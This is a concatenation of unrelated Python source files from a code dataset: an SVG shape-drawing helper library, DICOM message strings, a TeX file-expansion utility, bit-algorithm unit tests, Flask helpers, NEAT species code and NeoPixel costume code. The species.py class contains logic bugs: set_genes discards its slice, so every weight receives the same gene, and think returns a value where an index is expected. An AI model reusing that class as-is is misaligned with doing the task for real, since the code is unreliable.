The anchor point for the rotation. Defaults to (0, 0) when
not specified.
s:
Optional scale factor to scale the shape for each rotation.
This can be used to grow or shrink the shape while rotating.
angle:
Optional angle of rotation. Defaults to 360/n when not
specified,
Examples:
Cycle a line:
>>> shape = Line() | Cycle()
>>> show(shape)
Cycle a square:
>>> shape = Rectangle() | Cycle()
>>> show(shape)
Cycle a rectangle:
>>> shape = Rectangle(width=200, height=100) | Cycle()
>>> show(shape)
Cycle an ellipse:
>>> e = scale(Circle(), sx=1, sy=0.5)
>>> show(e | Cycle())
Create a spiral with shrinking squares:
>>> shape = Rectangle(width=300, height=300) | cycle(n=72, s=0.92)
>>> show(shape)
"""
def __init__(self, n=18, anchor=Point(x=0, y=0), s=None, angle=None):
self.n = n
self.angle = angle if angle is not None else 360/n
self.anchor = anchor
self.s = s
def apply(self, shape):
shapes = [shape | Rotate(angle=i*self.angle, anchor=self.anchor) for i in range(self.n)]
if self.s is not None:
shapes = [shape_ | Scale(sx=self.s**i) for i, shape_ in enumerate(shapes)]
return Group(shapes)
def show(*shapes):
"""Shows the given shapes.
It also adds a border to the canvas and axis at the origin with
a light color as a reference.
Parameters:
shapes:
The shapes to show.
Examples:
Show a circle:
>>> show(circle())
Show a circle and square.
>>> c = circle()
>>> s = rect()
>>> show(c, s)
"""
markers = [
Rectangle(width=300, height=300, stroke="#ddd"),
Line(start=Point(x=-150, y=0), end=Point(x=150, y=0), stroke="#ddd"),
Line(start=Point(x=0, y=-150), end=Point(x=0, y=150), stroke="#ddd")
]
shapes = markers + list(shapes)
img = SVG(shapes)
from IPython.display import display
display(img)
def circle(x=0, y=0, r=100, **kwargs):
"""Creates a circle with center at (x, y) and radius of r.
Examples:
Draw a circle.
c = circle()
show(c)
Draw a circle with radius 50.
c = circle(r=50)
show(c)
Draw a circle with center at (10, 20) and a radius of 50.
c = circle(x=10, y=20, r=50)
show(c)
"""
return Circle(center=Point(x=x, y=y), radius=r, **kwargs)
def rectangle(x=0, y=0, w=200, h=100, **kwargs):
"""Creates a rectangle with center at (x, y), a width of w and a height of h.
Examples:
Draw a rectangle.
r = rectangle()
show(r)
Draw a rectangle with width of 100 and height of 50.
r = rectangle(w=100, h=50)
show(r)
Draw a rectangle with center at (10, 20), a width of 100 and a height of 50.
r = rectangle(x=10, y=20, w=100, h=50)
show(r)
"""
return Rectangle(center=Point(x=x, y=y), width=w, height=h, **kwargs)
def ellipse(x=0, y=0, w=200, h=100, **kwargs):
"""Creates an ellipse with center at (x, y), a width of w and a height of h.
Examples:
Draw an ellipse.
r = ellipse()
show(r)
Draw an ellipse with a width of 100 and height of 50.
r = ellipse(w=100, h=50)
show(r)
Draw an ellipse with center at (10, 20), a width of 100 and a height of 50.
r = ellipse(x=10, y=20, w=100, h=50)
show(r)
"""
return Ellipse(center=Point(x=x, y=y), width=w, height=h, **kwargs)
def line(x1=None, y1=None, x2=None, y2=None, **kwargs):
"""Creates a line from point (x1, y1) to point (x2, y2).
Examples:
Draw a line.
z = line()
Draw a line from (10, 20) to (100, 200)
z = line(x1=10, y1=20, x2=100, y2=200)
"""
if x1 is None and y1 is None and x2 is None and y2 is None:
x1, y1 = -100, 0
x2, y2 = 100, 0
else:
pairs = dict(x1=x1, y1=y1, x2=x2, y2=y2)
missing = [name for name, value in pairs.items() if value is None]
if missing:
raise Exception("missing arguments for line: ", ", ".join(missing))
return Line(start=Point(x1, y1), end=Point(x2, y2), **kwargs)
def point(x, y):
"""Creates a Point with x and y coordinates.
"""
return Point(x, y)
def polygon(points, **kwargs):
"""Creates a polygon with given list points.
Example:
p1 = point(x=0, y=0)
p2 = point(x=100, y=0)
p3 = point(x=0, y=100)
triangle = polygon([p1, p2, p3])
show(triangle)
"""
points_str = " ".join(f"{p.x},{p.y}" for p in points)
return Shape(tag="polygon", points=points_str, **kwargs)
def polyline(points, **kwargs):
"""Creates a polyline with given list points.
Example:
p1 = point(x=-50, y=50)
p2 = point(x=0, y=-25)
p3 = point(x=0, y=25)
p4 = point(x=50, y=-50)
line = polyline([p1, p2, p3, p4])
show(line)
"""
points_str = " ".join(f"{p.x},{p.y}" for p in points)
return Shape(tag="polyline", points=points_str, **kwargs)
def translate(x=0, y=0):
"""Translates a shape.
Examples:
Translate a shape by 10 units in x direction.
shape = circle() | translate(x=10)
Translate a shape by 10 units in y direction.
shape = circle() | translate(y=10)
Translate a shape by 10 units in x direction and 20 units in y direction.
shape = circle() | translate(x=10, y=20)
"""
return Translate(x=x, y=y)
def scale(s=None, x=1, y=1):
"""Scales a shape.
Examples:
Scale a shape in both x and y directions:
shape = circle() | scale(0.5)
Scale a shape in only in x direction:
shape = circle() | scale(x=0.5)
Scale a shape in only in y direction:
shape = circle() | scale(y=0.5)
Scale a shape differently in x and y directions:
shape = circle() | scale(x=0.5, y=0.75)
"""
if s is not None:
return Scale(sx=s, sy=s)
else:
return Scale(sx=x, sy=y)
def rotate(angle):
"""Rotates a shape.
Examples:
Rotate a shape by 30 degrees
shape = line() | rotate(30)
"""
return Rotate(angle)
def repeat(n, transformation):
"""Repeats a transformation multiple times on a shape.
Examples:
Repeatly rotate a line 9 times by 10 degrees.
shape = line() | repeat(9, rotate(10))
"""
return Repeat(n, transformation)
def combine(shapes):
"""The combine function combines a list of shapes into a single shape.
Example:
>>> shapes = [circle(r=50), circle(r=100), circle(r=150)]
>>> shape = combine(shapes)
>>> show(shape)
"""
return Group(shapes)
def color(r, g, b, a=None):
"""Creates a color with given r g b values.
Parameters:
r - the red component of the color, allowed range is 0-255.
g - the green component of the color, allowed range is 0-255.
b - the blue component of the color, allowed range is 0-255.
a - optional argument to indicate the transparency or the
alpha value. The allowed range is 0-1.
"""
if a is None:
return f"rgb({r}, {g}, {b})"
else:
return f"rgba({r}, {g}, {b}, {a})"
def random(a=None, b=None):
"""Creates a random number.
The random function can be used in three ways:
random() # returns a random number between 0 and 1
random(n) # returns a random number between 0 and n
random(n1, n2) # returns a random number between n1 and n2
Examples:
>>> random()
0.4336206360591218
>>> random(10)
1.436301598755494
>>> random(5, 10)
7.471950621969087
"""
if a is None and b is None:
return random_module.random()
elif a is not None and b is None:
return a * random_module.random()
else:
delta = b - a
return a + delta * random_module.random()
| 25.980354 | 132 | 0.573805 |
acfb457f7974a440bf82a60533ea55e6ee7c4f11 | 576 | py | Python | src/dicom_parser/data_elements/messages.py | GalBenZvi/dicom_parser | fc3e892ebf99c4e5d62cb5e7de7df341baf445fe | [
"MIT"
] | 11 | 2020-08-08T21:41:54.000Z | 2021-07-27T12:48:31.000Z | src/dicom_parser/data_elements/messages.py | GalBenZvi/dicom_parser | fc3e892ebf99c4e5d62cb5e7de7df341baf445fe | [
"MIT"
] | 45 | 2020-03-03T14:32:16.000Z | 2021-07-30T16:42:17.000Z | src/dicom_parser/data_elements/messages.py | GalBenZvi/dicom_parser | fc3e892ebf99c4e5d62cb5e7de7df341baf445fe | [
"MIT"
] | 6 | 2021-10-19T09:19:22.000Z | 2022-03-13T19:26:10.000Z | """
Strings and string formatting templates used in this module.
"""
#: Message displayed when a failure occurs to parse a "DA" data element's raw
#: value.
DATE_PARSING_FAILURE = "Failed to parse '{value}' into a valid date object"
#: Message displayed when trying to parse an "SQ" data element directly.
INVALID_SEQUENCE_PARSING = (
"SequenceOfItems data element values should be assigned externally."
)
#: Message displayed when a failure occurs to parse a "TM" data element's raw
#: value.
TIME_PARSING_FAILURE = "Failed to parse '{value}' into a valid time object"
| 36 | 77 | 0.751736 |
acfb464f768ae2bfb391d2f97910a4514bed016c | 9,442 | py | Python | data-processing/common/normalize_tex.py | alexkreidler/scholarphi | 86d26d0bfa5ded00760fba1a9c6891a94a3dd6d2 | [
"Apache-2.0"
] | null | null | null | data-processing/common/normalize_tex.py | alexkreidler/scholarphi | 86d26d0bfa5ded00760fba1a9c6891a94a3dd6d2 | [
"Apache-2.0"
] | null | null | null | data-processing/common/normalize_tex.py | alexkreidler/scholarphi | 86d26d0bfa5ded00760fba1a9c6891a94a3dd6d2 | [
"Apache-2.0"
] | null | null | null | import logging
import os.path
import posixpath
import re
from dataclasses import dataclass
from enum import Enum, auto
from typing import List, Optional, Union
from common.scan_tex import Pattern, scan_tex
from common.types import CharacterRange, Path
@dataclass(frozen=True)
class Expansion(CharacterRange):
tex: str
@dataclass(frozen=True)
class EndInput(CharacterRange):
pass
class FileDiscoveryStrategy(Enum):
EXACT = auto()
INPUT = auto()
" Emulate behavior of \\input macro by appending '.tex' to a file name if it has no extension. "
INCLUDE = auto()
" Emulate behavior of \\include macro by appending '.tex' to all file names. "
# Pre-load a template that can be used to expand the '\include' macro.
with open(os.path.join("resources", "include-expansion.tex")) as file_:
INCLUDE_EXPANSION = file_.read()
def expand_tex(
tex_dir: Path,
tex_name: str,
discover_by: FileDiscoveryStrategy = FileDiscoveryStrategy.EXACT,
within: Optional[str] = None,
is_input: bool = False,
) -> Optional[str]:
"""
Unify the TeX in a file by combining together TeX from the files. The TeX file to be read is
'tex_name' and it will be looked for in 'tex_dir'.
Files can be searched for in the tex_dir according to special rules using the 'discover_by'
parameter. The parameter can tell the method to resolve the TeX filename using the rules that
are used by the '\\input'' or '\\include'' macros.
The 'within' parameter makes sure this function doesn't read files it shouldn't. Input files
are only expanded if their absolute resolved file path is inside the directory specified by
'within'. If 'within' is not specified, then it will be set to 'tex_dir'.
Based loosely on the code from the Perl latexpand utility in TeXLive, which is distributed under a
BSD license: https://ctan.org/pkg/latexpand?lang=en
Features not supported by this function are:
* \\includeonly command (which specifies which \\include scripts to process)
* handling quotation marks around input or included files. In some cases it will work the
same as LaTeX does, and in some cases it won't. It seems how files are included
that have quotes differs by LaTeX version https://tex.stackexchange.com/a/515259/198728
* expanding files that don't use a 'utf-8'-compatible encoding. TeX files can include
multiple input encodings, even within the same file. However, this function will not expand
input that fail to open as UTF-8 files.
"""
# Resolve path to TeX file, and make sure it's in a valid directory.
within = os.path.abspath(os.path.realpath(within or tex_dir))
qualified_tex_path = os.path.abspath(
os.path.realpath(os.path.join(tex_dir, tex_name))
)
if os.path.commonpath([within, qualified_tex_path]) != within:
logging.warning( # pylint: disable=logging-not-lazy
"TeX macro attempted to import file %s which is not in %s. This is forbidden. "
+ "This file will not be expanded.",
qualified_tex_path,
within,
)
return None
# Add '.tex' extension to the file name if it is being imported using an '\include' macro.
if discover_by == FileDiscoveryStrategy.INCLUDE:
qualified_tex_path += ".tex"
# Add the '.tex' extension to the file name as done for by the '\input' macro. As mentioned in
# the TeXBook, "TEX automatically supplies the suffix '.tex' if no suffix has been specified."
elif discover_by == FileDiscoveryStrategy.INPUT:
if len(os.path.splitext(qualified_tex_path)[1]) == 0:
qualified_tex_path += ".tex"
if not os.path.exists(qualified_tex_path):
logging.warning( # pylint: disable=logging-not-lazy
"Could not find file '%s' in directory '%s'. No text will be read from this file.",
tex_name,
tex_dir,
)
return None
input_patterns = [
# Put patterns with braces before those without braces so they have priority in matching.
Pattern("input_braces", r"\\input\s*{([^}]+)}"),
Pattern("input_quotes", r'\\input\s+"([^"]+)"'),
Pattern("input", r"\\input\s+(\S+)"),
]
# Note that while it's supported here, '\include' seem to be pretty rare in research papers.
# In a specific sample of about 120 conference papers, only 5 had '\include' macros, yet
# many more had '\input' commands). Only 1 used an '\include' macro to read in text.
# The rest of the files used '\include' macros to include macros and usepackage statements.
include_patterns = [
Pattern("include_braces", r"\\include\s*{([^}]+)}"),
Pattern("include", r"\\include\s+(\S+)"),
]
endinput_pattern = Pattern("endinput", r"\\endinput( |\t|\b|\{.*?\})")
patterns = input_patterns + include_patterns + [endinput_pattern]
# Read TeX for a file.
with open(qualified_tex_path, encoding="utf-8") as tex_file:
try:
tex = tex_file.read()
except Exception as e: # pylint: disable=broad-except
logging.warning( # pylint: disable=logging-not-lazy
"Could not read file at %s due to error: %s. The TeX for this file will "
+ "not be expanded",
qualified_tex_path,
e,
)
return None
replacements: List[Union[Expansion, EndInput]] = []
endinputs = []
end_file_at = None
# Scan file for input macros, expanding them.
for match in scan_tex(tex, patterns):
# If a file is being read as input, and the '\endinput' macro is reached, end output
# the end of the line that \endinput appears on. See the TeXBook for a description of
# the how \endinput is expanded.
if is_input and match.pattern is endinput_pattern:
endinput = EndInput(start=match.start, end=match.end)
replacements.append(endinput)
endinputs.append(endinput)
# Find the newline after the \endinput, after which no more inputs should be expanded
# and the file should be truncated.
end_of_line = re.compile("$", flags=re.MULTILINE)
end_of_line_match = end_of_line.search(tex, pos=match.end)
if end_of_line_match:
end_file_at = end_of_line_match.start()
continue
# Re-run the pattern against the matched text to extract the path to the file
# that is meant to be included.
match_with_groups = re.match(match.pattern.regex, match.text)
if match_with_groups is None or len(match_with_groups.groups()) < 1:
logging.warning( # pylint: disable=logging-not-lazy
"Unexpected error in extracting path for input / include command %s using "
+ "regular expression %s",
match.text,
match.pattern.regex,
)
continue
input_path = match_with_groups.group(1)
# Clean up the path
# In TeX, paths are specified in Unix format. Convert to platform-specific path format
# to let the program search for and read the file.
input_path = input_path.strip().replace(posixpath.sep, os.path.sep)
# Expand the input by reading in the expanded text in the input file.
discovery_strategy = (
FileDiscoveryStrategy.INCLUDE
if match.pattern in include_patterns
else FileDiscoveryStrategy.INPUT
)
input_tex = expand_tex(
# All inputs from expanded files will be resolved relative to the main
# directory of the project (i.e., the one where the TeX executable is invoked):
# https://tex.stackexchange.com/a/39084/198728
tex_dir,
input_path,
discover_by=discovery_strategy,
is_input=True,
# Specify the 'within' parameter to make sure that all expanded files reside
# in the directory where the main TeX file was expanded.
within=within,
)
if input_tex is None:
logging.warning( # pylint: disable=logging-not-lazy
"Could not read input TeX file %s included from file %s in directory %s. "
+ "This input macro will not be expanded.",
input_path,
tex_name,
tex_dir,
)
continue
if match.pattern in include_patterns:
input_tex = INCLUDE_EXPANSION.replace("<CONTENTS>", input_tex)
input_tex = input_tex.replace("<FILENAME>", input_path)
replacements.append(Expansion(start=match.start, end=match.end, tex=input_tex))
# Apply the expansions to the TeX.
expanded = tex
if end_file_at is not None:
expanded = expanded[:end_file_at]
for replacement in reversed(replacements):
if end_file_at is not None and replacement.start > end_file_at:
continue
if isinstance(replacement, EndInput):
expanded = expanded[: replacement.start] + "" + expanded[replacement.end :]
continue
if isinstance(replacement, Expansion):
expanded = (
expanded[: replacement.start]
+ replacement.tex
+ expanded[replacement.end :]
)
return expanded
| 42.151786 | 102 | 0.643508 |
acfb487fedc316e608be6c216e137a7eddf6576f | 42 | py | Python | api/src/function/control/deskFunction.py | SamuelJansen/Application | 6ab3202fb7de12782510f477a3e74d8800ea2927 | [
"MIT"
] | null | null | null | api/src/function/control/deskFunction.py | SamuelJansen/Application | 6ab3202fb7de12782510f477a3e74d8800ea2927 | [
"MIT"
] | null | null | null | api/src/function/control/deskFunction.py | SamuelJansen/Application | 6ab3202fb7de12782510f477a3e74d8800ea2927 | [
"MIT"
] | null | null | null | class Attribute:
FIRST_NAME = 'Desk'
| 10.5 | 23 | 0.666667 |
acfb49ec164c07b830fba34a2f18493bf6ef1945 | 2,171 | py | Python | species.py | polowis/neatevo | 165bbf81b2f55a85c945aed9cc6a817ee51ad476 | [
"MIT"
] | null | null | null | species.py | polowis/neatevo | 165bbf81b2f55a85c945aed9cc6a817ee51ad476 | [
"MIT"
] | null | null | null | species.py | polowis/neatevo | 165bbf81b2f55a85c945aed9cc6a817ee51ad476 | [
"MIT"
] | null | null | null | from network import Network
import math
class Species:
def __init__(self, model):
self.model = model
self.nn = self.generate_network() #//a list of the this.nodes in the order that they need to be considered in the NN
self.fitness = 0
self.score = 0
def generate_network(self):
"""generate the network"""
return Network(self.model)
def feed_forward(self):
"""feed forward species network"""
self.nn.feed_forward()
def flatten(self):
"""flatten species genes"""
genes = []
for i in range(len(self.nn.layers) - 1):
for w in range(len(self.nn.layers[i].nodes)):
for j in range(len(self.nn.layers[i].nodes[w].weights)):
genes.append(self.nn.layers[i].nodes[w].weights[j])
for weight in range(len(self.nn.layers[i].bias.weights)):
genes.append(self.nn.layers[i].bias.weights[weight])
return genes
def set_genes(self, genes: list):
"""set species gene"""
for i in range(len(self.nn.layers) - 1):
for w in range(len(self.nn.layers[i].nodes)):
for e in range(len(self.nn.layers[i].nodes[w].weights)):
self.nn.layers[i].nodes[w].weights[e] = genes[0]
slice_obj = slice(0, 1)
genes[slice_obj]
for w in range(len(self.nn.layers[i].bias.weights)):
self.nn.layers[i].bias.weights[w] = genes[0]
slice_obj = slice(0, 1)
genes[slice_obj]
def observe(self, ins):
"""get input and feed into network"""
self.nn.layers[0].set_value(ins)
def think(self):
"""get agent decision"""
index = -1
_max = float('-inf')
for i in range(len(self.nn.layers[len(self.nn.layers) -1].nodes)):
if self.nn.layers[len(self.nn.layers) - 1].nodes[i].value > _max:
# get the output node from neural network
index = self.nn.layers[len(self.nn.layers) - 1].nodes[i].value
return index
| 35.016129 | 124 | 0.543068 |
acfb4b03540aac233bff61ae4d054967b985175f | 8,520 | py | Python | tests/test_bit.py | nisaruj/algorithms | 1e03cd259c2d7ada113eb99843dcada9f20adf54 | [
"MIT"
] | 6 | 2018-12-12T09:14:05.000Z | 2019-04-29T22:07:28.000Z | tests/test_bit.py | nisaruj/algorithms | 1e03cd259c2d7ada113eb99843dcada9f20adf54 | [
"MIT"
] | null | null | null | tests/test_bit.py | nisaruj/algorithms | 1e03cd259c2d7ada113eb99843dcada9f20adf54 | [
"MIT"
] | 7 | 2019-03-21T10:18:22.000Z | 2021-09-22T07:34:10.000Z | from algorithms.bit import (
add_bitwise_operator,
count_ones_iter, count_ones_recur,
count_flips_to_convert,
find_missing_number, find_missing_number2,
flip_bit_longest_seq,
is_power_of_two,
reverse_bits,
single_number,
single_number2,
single_number3,
subsets,
get_bit, set_bit, clear_bit, update_bit,
swap_pair,
find_difference,
has_alternative_bit, has_alternative_bit_fast,
insert_one_bit, insert_mult_bits,
remove_bit,
binary_gap
)
import unittest
import random
class TestSuite(unittest.TestCase):
def setUp(self):
"""Initialize seed."""
random.seed("test")
def test_add_bitwise_operator(self):
self.assertEqual(5432 + 97823, add_bitwise_operator(5432, 97823))
self.assertEqual(0, add_bitwise_operator(0, 0))
self.assertEqual(10, add_bitwise_operator(10, 0))
self.assertEqual(10, add_bitwise_operator(0, 10))
def test_count_ones_recur(self):
# 8 -> 1000
self.assertEqual(1, count_ones_recur(8))
# 109 -> 1101101
self.assertEqual(5, count_ones_recur(109))
# 63 -> 111111
self.assertEqual(6, count_ones_recur(63))
# 0 -> 0
self.assertEqual(0, count_ones_recur(0))
def test_count_ones_iter(self):
# 8 -> 1000
self.assertEqual(1, count_ones_iter(8))
# 109 -> 1101101
self.assertEqual(5, count_ones_iter(109))
# 63 -> 111111
self.assertEqual(6, count_ones_iter(63))
# 0 -> 0
self.assertEqual(0, count_ones_iter(0))
def test_count_flips_to_convert(self):
# 29: 11101 and 15: 01111
self.assertEqual(2, count_flips_to_convert(29, 15))
# 45: 0000101101 and 987: 1111011011
self.assertEqual(8, count_flips_to_convert(45, 987))
# 34: 100010
self.assertEqual(0, count_flips_to_convert(34, 34))
# 34: 100010 and 53: 110101
self.assertEqual(4, count_flips_to_convert(34, 53))
def test_find_missing_number(self):
self.assertEqual(7, find_missing_number([4, 1, 3, 0, 6, 5, 2]))
self.assertEqual(0, find_missing_number([1]))
self.assertEqual(1, find_missing_number([0]))
nums = [i for i in range(100000) if i != 12345]
random.shuffle(nums)
self.assertEqual(12345, find_missing_number(nums))
def test_find_missing_number2(self):
self.assertEqual(7, find_missing_number2([4, 1, 3, 0, 6, 5, 2]))
self.assertEqual(0, find_missing_number2([1]))
self.assertEqual(1, find_missing_number2([0]))
nums = [i for i in range(100000) if i != 12345]
random.shuffle(nums)
self.assertEqual(12345, find_missing_number2(nums))
def test_flip_bit_longest_seq(self):
# 1775: 11011101111
self.assertEqual(8, flip_bit_longest_seq(1775))
# 5: 101
self.assertEqual(3, flip_bit_longest_seq(5))
# 71: 1000111
self.assertEqual(4, flip_bit_longest_seq(71))
# 0: 0
self.assertEqual(1, flip_bit_longest_seq(0))
def test_is_power_of_two(self):
self.assertTrue(is_power_of_two(64))
self.assertFalse(is_power_of_two(91))
self.assertTrue(is_power_of_two(2**1001))
self.assertTrue(is_power_of_two(1))
self.assertFalse(is_power_of_two(0))
def test_reverse_bits(self):
self.assertEqual(43261596, reverse_bits(964176192))
self.assertEqual(964176192, reverse_bits(43261596))
self.assertEqual(1, reverse_bits(2147483648))
# bin(0) => 00000000000000000000000000000000
self.assertEqual(0, reverse_bits(0))
# bin(2**32 - 1) => 11111111111111111111111111111111
self.assertEqual(2**32 - 1, reverse_bits(2**32 - 1))
def test_single_number(self):
random.seed('test')
self.assertEqual(0, single_number([1, 0, 2, 1, 2, 3, 3]))
self.assertEqual(101, single_number([101]))
single = random.randint(1, 100000)
nums = [random.randint(1, 100000) for _ in range(1000)]
nums *= 2 # nums contains pairs of random integers
nums.append(single)
random.shuffle(nums)
self.assertEqual(single, single_number(nums))
def test_single_number2(self):
self.assertEqual(3, single_number2([4, 2, 3, 2, 1, 1, 4, 2, 4, 1]))
single = random.randint(1, 100000)
nums = [random.randint(1, 100000) for _ in range(1000)]
nums *= 3 # nums contains triplets of random integers
nums.append(single)
random.shuffle(nums)
self.assertEqual(single, single_number2(nums))
def test_single_number3(self):
self.assertEqual(sorted([2,5]),
sorted(single_number3([2, 1, 5, 6, 6, 1])))
self.assertEqual(sorted([4,3]),
sorted(single_number3([9, 9, 4, 3])))
def test_subsets(self):
self.assertSetEqual(subsets([1, 2, 3]),
{(), (1,), (2,), (3,), (1, 2), (1, 3), (2, 3), (1, 2, 3)})
self.assertSetEqual(subsets([10, 20, 30, 40]),
{(10, 40), (10, 20, 40), (10, 30), (10, 20, 30, 40), (40,),
(10, 30, 40), (30,), (20, 30), (30, 40), (10,), (),
(10, 20), (20, 40), (20, 30, 40), (10, 20, 30), (20,)})
def test_get_bit(self):
# 22 = 10110
self.assertEqual(1, get_bit(22, 2))
self.assertEqual(0, get_bit(22, 3))
def test_set_bit(self):
# 22 = 10110 --> after set bit at 3th position: 30 = 11110
self.assertEqual(30, set_bit(22, 3))
def test_clear_bit(self):
# 22 = 10110 --> after clear bit at 2nd position: 20 = 10010
self.assertEqual(18, clear_bit(22, 2))
def test_update_bit(self):
# 22 = 10110 --> after update bit at 3th position with value 1: 30 = 11110
self.assertEqual(30, update_bit(22, 3, 1))
# 22 = 10110 --> after update bit at 2nd position with value 0: 20 = 10010
self.assertEqual(18, update_bit(22, 2, 0))
def test_swap_pair(self):
# 22: 10110 --> 41: 101001
self.assertEqual(41, swap_pair(22))
# 10: 1010 --> 5 : 0101
self.assertEqual(5, swap_pair(10))
def test_find_difference(self):
self.assertEqual('e', find_difference("abcd", "abecd"))
def test_has_alternative_bit(self):
self.assertTrue(has_alternative_bit(5))
self.assertFalse(has_alternative_bit(7))
self.assertFalse(has_alternative_bit(11))
self.assertTrue(has_alternative_bit(10))
def test_has_alternative_bit_fast(self):
self.assertTrue(has_alternative_bit_fast(5))
self.assertFalse(has_alternative_bit_fast(7))
self.assertFalse(has_alternative_bit_fast(11))
self.assertTrue(has_alternative_bit_fast(10))
def test_insert_one_bit(self):
"""
Input: num = 10101 (21)
insert_one_bit(num, 1, 2): 101101 (45)
insert_one_bit(num, 0 ,2): 101001 (41)
insert_one_bit(num, 1, 5): 110101 (53)
insert_one_bit(num, 1, 0): 101010 (42)
"""
self.assertEqual(45, insert_one_bit(21, 1, 2))
self.assertEqual(41, insert_one_bit(21, 0, 2))
self.assertEqual(53, insert_one_bit(21, 1, 5))
self.assertEqual(43, insert_one_bit(21, 1, 0))
def test_insert_mult_bits(self):
"""
Input: num = 101 (5)
insert_mult_bits(num, 7, 3, 1): 101111 (47)
insert_mult_bits(num, 7, 3, 0): 101111 (47)
insert_mult_bits(num, 7, 3, 3): 111101 (61)
"""
self.assertEqual(47, insert_mult_bits(5, 7, 3, 1))
self.assertEqual(47, insert_mult_bits(5, 7, 3, 0))
self.assertEqual(61, insert_mult_bits(5, 7, 3, 3))
def test_remove_bit(self):
"""
Input: num = 10101 (21)
remove_bit(num, 2): output = 1001 (9)
remove_bit(num, 4): output = 101 (5)
remove_bit(num, 0): output = 1010 (10)
"""
self.assertEqual(9, remove_bit(21, 2))
self.assertEqual(5, remove_bit(21, 4))
self.assertEqual(10, remove_bit(21, 0))
def test_binary_gap(self):
# 22 = 10110
self.assertEqual(2, binary_gap(22))
# 6 = 110
self.assertEqual(1, binary_gap(6))
# 8 = 1000
self.assertEqual(0, binary_gap(8))
# 145 = 10010001
self.assertEqual(4, binary_gap(145))
if __name__ == '__main__':
unittest.main()
| 33.411765 | 87 | 0.608803 |
acfb4dedc660f50cb731ffe15046d0f8ba4f571b | 905 | py | Python | app/controllers.py | overclock07/info3180-Project2 | 44c28ccd6d006aa488daf718953f44c64c444f4d | [
"MIT"
] | null | null | null | app/controllers.py | overclock07/info3180-Project2 | 44c28ccd6d006aa488daf718953f44c64c444f4d | [
"MIT"
] | null | null | null | app/controllers.py | overclock07/info3180-Project2 | 44c28ccd6d006aa488daf718953f44c64c444f4d | [
"MIT"
] | null | null | null | from .models import Users
import os
from .forms import ALLOWED_EXTENSIONS
# Here we define a function to collect form errors from Flask-WTF
# which we can later use
def form_errors(form):
error_messages = []
"""Collects form errors"""
for field, errors in form.errors.items():
for error in errors:
message = u"Error in the %s field - %s" % (
getattr(form, field).label.text,
error
)
error_messages.append(message)
return error_messages
def allowed_file(filename):
return '.' in filename and \
filename.rsplit('.', 1)[1].lower() in ALLOWED_EXTENSIONS
def get_uploaded_images(user_URI):
rootdir = os.getcwd()
for subdir,dirs,files in os.walk(rootdir +user_URI[1:-1]):
for file in files:
ls=os.path.join(subdir,file).split('/')[-2:]
return '/'.join(ls) | 31.206897 | 67 | 0.614365 |
acfb4e239156aa6e995d2359883ac12e19c2704b | 3,366 | py | Python | HalloWing/main.py | Dthurow/CyberpunkCostumeCode | 881d064ca005ef708d82c07cc1395e196294139c | [
"MIT"
] | null | null | null | HalloWing/main.py | Dthurow/CyberpunkCostumeCode | 881d064ca005ef708d82c07cc1395e196294139c | [
"MIT"
] | null | null | null | HalloWing/main.py | Dthurow/CyberpunkCostumeCode | 881d064ca005ef708d82c07cc1395e196294139c | [
"MIT"
] | null | null | null | import time
import board
import neopixel
import audioio
import touchio
# On CircuitPlayground Express, and boards with built in status NeoPixel -> board.NEOPIXEL
# Otherwise choose an open pin connected to the Data In of the NeoPixel strip, i.e. board.D1
pixel_pin = board.EXTERNAL_NEOPIXEL
#color standards
RED = 0x100000
YELLOW = (0x10, 0x10, 0)
GREEN = (0, 0x10, 0)
AQUA = (0, 0x10, 0x10)
BLUE = (0, 0, 0x10)
PURPLE = (0x10, 0, 0x10)
BLACK = (0, 0, 0)
# The number of NeoPixels
num_pixels = 30
# The order of the pixel colors - RGB or GRB. Some NeoPixels have red and green reversed!
# For RGBW NeoPixels, simply change the ORDER to RGBW or GRBW.
ORDER = neopixel.GRB
#set the left and right touch sensors
touch1 = touchio.TouchIn(board.A2)
touch2 = touchio.TouchIn(board.A5)
#set the speaker
AUDIO = audioio.AudioOut(board.A0) # Speaker
pixels = neopixel.NeoPixel(pixel_pin, num_pixels, brightness=0.2, auto_write=False,
pixel_order=ORDER)
def play_wav(name, loop=False):
"""
Play a WAV file in the 'sounds' directory.
@param name: partial file name string, complete name will be built around
this, e.g. passing 'foo' will play file 'sounds/foo.wav'.
@param loop: if True, sound will repeat indefinitely (until interrupted
by another sound).
"""
try:
wave_file = open('Sounds/' + name + '.wav', 'rb')
wave = audioio.WaveFile(wave_file)
AUDIO.play(wave, loop=loop)
except:
return
def color_chase(color, wait):
for i in range(num_pixels):
pixels[i] = color
time.sleep(wait)
pixels.show()
def wheel(pos):
# Input a value 0 to 255 to get a color value.
# The colours are a transition r - g - b - back to r.
if pos < 0 or pos > 255:
r = g = b = 0
elif pos < 85:
r = int(pos * 3)
g = int(255 - pos*3)
b = 0
elif pos < 170:
pos -= 85
r = int(255 - pos*3)
g = 0
b = int(pos*3)
else:
pos -= 170
r = 0
g = int(pos*3)
b = int(255 - pos*3)
return (r, g, b) if ORDER == neopixel.RGB or ORDER == neopixel.GRB else (r, g, b, 0)
def off(audioOff = True):
pixels.fill((0,0,0))
pixels.show()
if audioOff and AUDIO.playing:
AUDIO.stop()
def partyRainbow():
playMusic()
for i in range(0, num_pixels, 2):
pixel_index = (i * 256 // num_pixels)
pixels[i] = wheel(pixel_index & 255)
pixels.show()
time.sleep(.1)
off(False)
time.sleep(.1)
for i in range(1, num_pixels, 2):
pixel_index = (i * 256 // num_pixels)
pixels[i] = wheel(pixel_index & 255)
pixels.show()
time.sleep(.1)
off(False)
time.sleep(.1)
def flash():
pixels.fill((0, 0x10, 0))
pixels.show()
time.sleep(.2)
off(False)
time.sleep(.2)
def playMusic():
if not AUDIO.playing:
play_wav("Monplaisir_-_04_-_Level_1")
def colorChase():
color_chase(AQUA, .2)
off()
StateList = [colorChase, flash, partyRainbow]
CurState = 0
RunStates = False
while True:
if (touch1.value):
CurState = (CurState + 1)% len(StateList)
off()
if (touch2.value):
RunStates = not RunStates
if RunStates:
StateList[CurState]()
else:
off()
time.sleep(.2)
| 24.215827 | 92 | 0.601604 |
acfb4f0b6868d280dc35e8062ef53c204d6534b7 | 13,142 | py | Python | contrib/unaccent/generate_unaccent_rules.py | g0djan/postgres | 741b1aaf61a3da10250555f827c0a7a2f9bc2822 | [
"PostgreSQL"
] | 3 | 2020-12-31T10:40:25.000Z | 2021-06-04T09:12:05.000Z | contrib/unaccent/generate_unaccent_rules.py | g0djan/postgres | 741b1aaf61a3da10250555f827c0a7a2f9bc2822 | [
"PostgreSQL"
